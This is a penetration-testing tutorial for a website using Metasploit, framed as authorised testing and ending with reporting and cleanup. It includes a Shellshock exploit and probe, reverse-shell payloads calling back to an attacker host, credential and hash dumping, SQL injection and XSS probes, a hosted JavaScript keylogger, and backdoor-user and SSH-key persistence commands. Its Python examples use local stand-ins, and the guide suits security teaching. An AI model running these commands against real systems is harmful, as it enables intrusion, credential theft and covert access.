METASPLOIT - Pentest a Personal Website
Starting Metasploit
First, launch Metasploit's console to begin the penetration test:
msfconsole
Web Scanning for Vulnerabilities
Metasploit has no general-purpose SQL injection or XSS scanner; its auxiliary/scanner/http modules cover fingerprinting and content discovery, and injection flaws are confirmed by hand or with a dedicated tool. The following module brute-forces directory and file names from a wordlist (DICTIONARY, one name per line; PATHS is not an option of this module) and reports every path that does not answer 404, which is how /admin, /login or /wp-login.php are found:
use auxiliary/scanner/http/dir_scanner
set RHOSTS <target_ip>
set DICTIONARY /path/to/wordlist.txt
run
Before trusting the output, request a path that cannot exist: a site that answers 200 to everything will mark every word in the list as found. auxiliary/scanner/http/http_version identifies the server software and is a good first module to run.
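To show what the module actually does, and the catch-all pitfall, in working code, here is an added example (not from the original page and not Metasploit code) in Python. It starts a constructed stand-in site on localhost with a few fake routes, then runs a status-based discovery that first fetches a random path as a baseline, so a site that answers 200 to everything is not reported as full of hits.

```python
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Constructed stand-in for the target: /admin exists, /login redirects,
# /private is forbidden, everything else is a real 404.
_ROUTES = {
    "/admin": (200, b"<h1>admin</h1>"),
    "/login": (302, b""),
    "/private": (403, b"forbidden"),
}


class _FakeSite(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = _ROUTES.get(self.path, (404, b"not found"))
        self.send_response(status)
        if status == 302:
            self.send_header("Location", "/login/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the test server quiet
        pass


def start_fake_site():
    """Bind the fake site to a free port and serve it from a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeSite)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def _fetch(base_url, path):
    """GET one path without following redirects; return (status, body length)."""
    u = urlparse(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
    conn.request("GET", path, headers={"User-Agent": "dir-check"})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, len(body)


def discover(base_url, wordlist):
    """Status-based discovery with a soft-404 baseline.

    The baseline request uses a path that cannot exist. If the site answers
    anything but 404 there, it has a catch-all, and a bare status check would
    report every word in the list; responses matching the baseline signature
    (status and body length) are therefore ignored.
    """
    baseline = _fetch(base_url, "/" + secrets.token_hex(8))
    found = []
    for word in wordlist:
        path = "/" + word.strip("/")
        sig = _fetch(base_url, path)
        if sig[0] != 404 and sig != baseline:
            found.append((path, sig[0]))
    return found


if __name__ == "__main__":
    srv, url = start_fake_site()
    print(discover(url, ["admin", "login", "wp-login.php", "private", "nothing"]))
    srv.shutdown()
```

Against a real target the same logic applies: run the baseline request first, and treat 403 and 30x answers as findings, since they prove the path exists even if its content is not reachable.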
Exploiting Vulnerabilities
Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.
Searching for Exploits
Search for available exploits related to the website's technology stack:
search type:exploit <technology_or_vulnerability>
Example of Exploit Execution
apache_mod_cgi_bash_env_exec is the Shellshock exploit (CVE-2014-6271): it does not target an Apache or PHP version as such, but a CGI script that is executed by an unpatched bash, and it needs the path of a CGI script that actually exists on the target (TARGETURI must be set). Set LHOST for the reverse connection and use check before run; the module sends a harmless probe and reports whether the target is vulnerable:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target_ip>
set TARGETURI /cgi-bin/test.cgi
set LHOST <attacker_ip>
check
run
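The probe the module sends is easy to reproduce. The following added example (not part of the original page and not the module's code) builds the CVE-2014-6271 environment value, runs the classic local test against whatever bash is installed, and shows the User-Agent value used for the same test over HTTP against a CGI script; the leading echo in that value terminates the HTTP headers so the command output reaches the client as the response body. The MARKER string and the variable name PROBE are arbitrary choices made here.

```python
import shutil
import subprocess

MARKER = "shellshock-marker"  # printed only if the trailing command executes


def shellshock_env_value(command: str) -> str:
    """Build the CVE-2014-6271 probe: a function definition followed by
    trailing commands. Unpatched bash runs the trailing part while importing
    the variable, before any script or -c command."""
    return "() { :; }; " + command


def cgi_probe_header(command: str = "/bin/bash -c 'id'") -> str:
    """User-Agent value for the same test over HTTP. The CGI interface copies
    request headers into environment variables (HTTP_USER_AGENT), so the probe
    reaches bash when the script starts. The leading 'echo' emits the blank
    line that ends the HTTP headers, so the command output is returned as the
    body instead of producing a 500."""
    return shellshock_env_value("echo; " + command)


def local_bash_is_vulnerable():
    """Classic local test. Returns True if the trailing echo ran, False if
    bash ignored it (patched), None if no bash is installed."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": "/usr/bin:/bin", "PROBE": shellshock_env_value(f"echo {MARKER}")}
    # Patched bash treats PROBE as an ordinary variable and only prints "done".
    result = subprocess.run([bash, "-c", "echo done"], env=env,
                            capture_output=True, text=True, timeout=10)
    return MARKER in result.stdout


if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_is_vulnerable())
    print("header to send:", cgi_probe_header())
```

On a remote target the check is the same header sent to the CGI path with curl or the module's check command; a body containing the output of id means the script is executed by a vulnerable bash.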
Post-Exploitation
After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.
Creating a Reverse Shell
A reverse shell is the payload an exploit delivers, not a module you run on its own, and a session is not persistence: it ends when the connection or the process does. Select the payload on the exploit module before running it:
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run
If the payload reaches the target some other way (for example a file built with msfvenom), start a handler that listens for the connection, as a background job so the console stays usable, and list the sessions it catches:
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run -j
sessions -l
Dumping Web Server Credentials
Post modules run against an existing session (set SESSION <id>, with the id taken from sessions -l), not against RHOSTS. Web application credentials usually live in the application's own configuration (database connection strings in files such as wp-config.php), so the first step is collecting configuration files; with a root session you can also dump the system password hashes:
use post/linux/gather/enum_configs
set SESSION <id>
run
use post/linux/gather/hashdump
set SESSION <id>
run
Everything collected is stored as loot (the loot command lists it) and must appear in the report.
Exploiting Web Application Vulnerabilities
If a web application vulnerability such as SQL injection is discovered, keep in mind that Metasploit has no generic SQL injection exploit and no SQL_PAYLOAD option: its exploit modules target specific, known vulnerabilities in named products and versions.
Using SQL Injection Exploits
Confirm the injection by hand first (the classic probe is a closing quote followed by a condition, such as 1' OR 1=1--, compared against 1' AND 1=2--), or with a dedicated tool such as sqlmap. Then search for a module matching the product you identified, read its options and run it; for a phpMyAdmin install the sequence is:
search type:exploit phpmyadmin
use <module_path_from_the_search>
show options
set RHOSTS <target_ip>
set TARGETURI /phpmyadmin
run
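An added example, not from the original page, showing in Python with an in-memory SQLite table why the 1' OR 1=1-- probe works, why bound parameters stop it, and the boolean-based comparison a scanner performs to tell the two apart. The users table and its two rows are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query: the classic injectable login.
    A username of  ' OR 1=1--  turns the WHERE clause into
    username = '' OR 1=1  and comments out the password check."""
    sql = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def looks_injectable(login, conn):
    """Boolean-based check: append a true and a false condition to the same
    input. If the two requests behave differently, the input reached the SQL
    parser; an inert parameter gives the same (failed) result both times."""
    true_case = login(conn, "admin' AND '1'='1'--", "wrong")
    false_case = login(conn, "admin' AND '1'='2'--", "wrong")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "' OR 1=1--", ""))   # admin
    print("safe:      ", login_safe(db, "' OR 1=1--", ""))         # None
    print("detect vuln:", looks_injectable(login_vulnerable, db))  # True
    print("detect safe:", looks_injectable(login_safe, db))        # False
```

The detection step is what a scanner automates: it never needs to know the schema, only that two requests differing in a logically true versus false condition produce different pages.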
Using Cross-Site Scripting (XSS) Exploit
There is no generic XSS exploit module. A reflected XSS is confirmed by sending a marker in the parameter (for example q=<s>xss</s>, or the alert('XSS') call inside a script tag) and checking that it comes back in the response without HTML encoding. Where Metasploit helps is on the attacker side of a confirmed XSS: it can host the script that the injected tag loads, for example a JavaScript keylogger, run as a background job (info shows the URL the script is served from):
use auxiliary/server/capture/http_javascript_keylogger
set SRVHOST <attacker_ip>
set URIPATH /log
run -j
The payload injected into the vulnerable page then points a script src at that URL.
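An added example, not from the original page: a constructed search handler that reflects the q parameter into HTML, its escaped counterpart, and the reflection check described above. html.escape is correct for element content and quoted attribute values; a value placed inside a script block or a URL needs encoding for that context instead.

```python
import html
from urllib.parse import parse_qs, quote


def _query_param(query_string: str, name: str = "q") -> str:
    """Pull one parameter out of a raw query string (constructed stand-in for
    the web framework's request parsing; percent-decoding happens here)."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def search_page_vulnerable(query_string: str) -> str:
    """Reflected XSS: the parameter is concatenated straight into HTML."""
    q = _query_param(query_string)
    return f"<p>Results for: {q}</p>"


def search_page_safe(query_string: str) -> str:
    """Same page with output encoding for the HTML element context."""
    q = _query_param(query_string)
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def reflects_unencoded(render, marker: str = "<s>xss-canary</s>") -> bool:
    """Manual XSS check: submit a harmless tag and see whether it comes back
    byte-for-byte. An encoded reflection (&lt;s&gt;) is not exploitable."""
    body = render("q=" + quote(marker, safe=""))
    return marker in body


if __name__ == "__main__":
    probe = "q=" + quote("<script>alert('XSS')</script>", safe="")
    print(search_page_vulnerable(probe))
    print(search_page_safe(probe))
    print(reflects_unencoded(search_page_vulnerable), reflects_unencoded(search_page_safe))
```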
Maintaining Access
Once you have exploited a vulnerability and hold a session, further testing may need access that survives a dropped connection or a reboot. Only do this if persistence is within the agreed scope, and record every artifact you install (account, key, cron entry) with a timestamp so the cleanup phase removes all of it.
Adding a Backdoor User
Metasploit has no post/linux/manage/adduser module (post/windows/manage/add_user exists for Windows targets). On a Linux target with a root session, add the account from a system shell (from a Meterpreter session, type shell first):
useradd -m -s /bin/bash <username>
echo '<username>:<password>' | chpasswd
Persistence Modules
A second reverse shell is not persistence. Metasploit's Linux persistence modules run against an existing session and install something that re-establishes access later, for example an SSH key added to a user's authorized_keys:
use post/linux/manage/sshkey_persistence
set SESSION <id>
run
Check loot for the private key the module generates, note which authorized_keys file it touched, and remove the key during cleanup.
Reporting
Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.
Generating a Report
msfconsole has no report command. Findings are recorded in the framework database (db_status shows whether it is connected); spool captures console output to a file, and db_export writes the database contents to XML. A plain-text summary plus an XML export looks like this:
spool /path/to/console.log
hosts
services
vulns
creds
loot
spool off
db_export -f xml /path/to/findings.xml
The report itself is written from these records: for each finding, the evidence, the module used and the exact actions taken on the target.
Clean Up
After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.
Remove Backdoor User
If you added any accounts, remove them the same way they were created, from a shell on the target, and delete any SSH key or cron entry installed for persistence:
userdel -r <username>
Check the authorized_keys file of every user you touched (root's is /root/.ssh/authorized_keys) and the crontabs for entries you added.
Deleting Reverse Shells
Kill every open session and every background job (handlers and servers started with -j), then confirm nothing is left:
sessions -K
jobs -K
sessions -l
jobs -l
